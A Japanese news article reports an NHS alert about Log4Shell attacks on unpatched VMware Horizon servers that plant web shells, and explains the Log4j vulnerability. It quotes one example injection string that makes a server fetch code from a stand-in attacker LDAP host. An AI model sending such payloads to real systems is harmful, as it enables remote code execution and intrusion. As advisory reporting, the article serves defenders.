英国のNational Health Service (NHS)は、VMWare Horizonサーバに対する継続的な攻撃が行われていることを警告しました
攻撃者は、ウェブシェルを確立するために、VMware HorizonサーバのLog4Shellの脆弱性を積極的に狙っています。
NHSは発表したセキュリティ・アラートの中で、「このLog4Shellは、攻撃者によって追加の悪意のあるソフトウェアの展開、データの流出、ランサムウェアの展開など、多くの悪意のある活動を行うために使用されているようです」と述べています。
2021年12月、ランサムウェア「Conti」がLog4Shellを悪用してVMWare vCenterサーバを侵害したとの報告がありましたが、今回のNHSの攻撃はLog4Shellの脆弱性を利用してVMWare製品が標的となった2度目の攻撃となります。
Log4Shellとは
2021年12月9日に公開されたLog4Shellは、JavaのWebアプリケーションやデスクトップアプリケーションにログ管理機能を追加するためのJavaライブラリであるApache Log4jに存在する脆弱性です。
この脆弱性は、Log4jをログ管理に利用していたMinecraftサーバーの運営者が11月下旬に発見したもので、何者かが以下のような形式のエクスプロイトを利用してサーバーを乗っ取っていることがわかりました。
${jndi:ldap://attacker.com/malicious_script}
攻撃を修正して対抗するためにLog4jのパッチがリリースされましたが、VMWareはLog4Shellのエクスプロイトによって自社のソフトウェアが容易に悪用されることを防ぐために、Log4jの修正を自社製品に統合した企業の一つです。
企業のスタッフ向けに仮想デスクトップを管理・展開するためのプラットフォームであるVMWare Horizonは、Log4Shell攻撃を防ぐためのパッチを受けた数多くのVMWareの影響を受ける製品の一つでした。
NHSがVMWare HorizonサーバーへのLog4Shell攻撃を発見
しかし、NHSによると、パッチが提供されているにもかかわらず、パッチが適用されていないVMWare Horizonサーバーを特定しようとする攻撃が確認されているとのことです。
NHSのセキュリティチームによると、この攻撃は初期のLog4Shellエクスプロイト(詳細は上述)のパターンを踏襲しており、攻撃者はVMWare HorizonサーバーにJDNIリクエストを送信します。
サーバーにパッチが適用されていない場合、攻撃者のエクスプロイトによりHorizonサーバーはLDAP経由で悪意のあるドメインに接続させられ、WebシェルをインストールするPowerShellスクリプトをダウンロードして実行し、これが今後の攻撃のためのバックドアとして機能します。
VMWare Horizonサーバを運用している組織を支援するために、英国NHSは悪用の可能性がある兆候を検出する方法についての説明を公開しました。
このアドバイスは、NHSのテクニカルレポートに記載されていますが、NHSがコードを更新してより優れた検知機能を持つようになる事態を避けるため、ここでは再現しません。
Comments